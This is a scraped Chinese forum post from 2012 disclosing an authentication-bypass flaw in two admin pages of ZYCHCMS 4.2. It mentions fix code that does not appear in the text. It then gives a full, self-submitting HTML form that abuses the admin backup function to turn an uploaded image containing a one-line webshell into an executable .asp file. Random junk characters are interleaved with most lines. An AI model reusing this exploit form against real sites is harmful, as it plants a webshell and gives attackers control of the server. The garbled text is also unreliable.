- s- a O" b& i6 b, b) x$ @
9 ]3 B7 u/ ~5 y
( h$ ]' C4 q7 n/ A" L, C% j5 I, D/ p9 U9 V
影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)
: r+ K" k" D( j B+ i1 k& t ①SQL注射漏洞1 c( [3 T9 J7 w* v- {* d
漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp) y" x; O$ p6 p& z# z1 e
漏洞原因:未过滤
/ f' O$ D" n6 e5 D" Y 漏洞代码:! T$ \$ V E- y# w9 z
都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。$ H$ z J6 L! ?; _* F" \6 L
修复方法:在文件开头加入代码
3 Y1 {' m3 ^. C6 j . u3 ^+ e8 ~- _
0 X# G7 w) E0 S8 j
②后台拿WBSHELL
4 w) p9 h$ \, p! _ |7 E 进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。- \/ d/ m2 F X
这里在网上找了一个,改了下,将就着用。" h% E/ s: F& y3 K& ]) l S7 ~4 E
以下是代码本地提交代码+ ?* p w- W' C, _% y8 a- I
7 w) R' H, D; V) d
: r- _: C- s, k& N/ H `<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>
3 [- R7 i* m1 m8 g) ]/ H <!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>$ z3 J$ Z; [* `- s z6 g
<tr>
& B8 w0 X I2 C5 p <td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>
6 e4 A/ x" n5 U4 e0 O7 T </tr>
( W/ S" @: B7 H" \- B" y7 F5 J <tr>
0 w2 C% y# D* U; c1 v <td bgcolor=”#FFFFFF”><span class=”back_southidc”>
, P7 T! [/ S+ R( f6 ? </span>7 D: y7 J' b0 r6 l a
<table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >
) P5 B0 H3 b) z- g8 @! O <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >
1 Q' H% W' f& v* S- z. B& W <td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>
3 J3 U8 x! d. R3 P& q0 p <td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d2 J9 W5 B/ j6 ~: T* b
<div align=”left”>
1 P0 U' d2 U) ?9 ~# L9 M9 \$ u <input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />
8 k3 P9 r- J; ]$ M$ ~7 M( Q- Z1 C <!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>, ? }7 d- a6 ?& a3 |
<input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />+ O$ K0 z2 l4 D: m9 R4 s0 c
</div></td>. R- r1 O) @, z6 l: x) x
</tr>
* P" C" N, Z; V <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>
& M2 j8 `9 S# A5 Q8 R <td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>
7 h) t: \, Y2 C9 t <td class=”td”><div align=”left”>2 G ?1 G) o' J; d8 [2 x5 F+ c
<input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />0 |2 o! n4 b. T4 ^5 P
[如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>+ B8 T( a3 H- T R. {9 L
</tr>$ X& i. V& y6 ?3 _% I6 T1 ?2 @; v* M( f
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>
, j7 H( B1 W u% j' M <td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>, l& i9 w; J: |/ |6 P- r" {) Q8 i/ o
<td class=”td”><div align=”left”>
- V% z9 ~% [4 M% L; D( O; x <input type=”submit” value=”确定备份” class=”btn”
1 ?" y' d6 K$ S9 S$ R </div></td>
) e8 o) \+ D6 o" A </tr>+ E& c# {, @8 v Y7 ?0 b# H
</table></td></tr></form># J: T: `) q) a. ?
</table>
7 j3 \ x: D+ Y$ T& p3 q v </td>7 D% W' U# G% L4 H/ c
</tr>4 r1 H+ U+ b6 ?( b$ o
</table>: M2 g: B' ^; D- E
<script>0 b1 J6 h6 x' u* @) s* R% W; n
document.all.add.submit();1 h! e) m: a! R. w% }* ?" l
</script>4 `$ D6 n$ V ]! V0 y2 I
8 g3 }0 Z1 l5 l; M
( ~- K8 ]9 W% C$ p' C% S
2 K" W2 K( H( y' @" c; o% {5 {
' [5 {, H' t" Y7 t9 j
) T. P( q- ~7 V. y" |( d; j1 Z' z& y/ v* G0 T/ f- W+ u
# v) C, I' O, ]/ e3 P7 `
/ ]9 I' x& t% q' D8 Q& \( Q. c8 {) x9 r- m
; k4 x; i, _$ l7 k
|
发表于 2012-9-10 21:09:51
收藏
支持
反对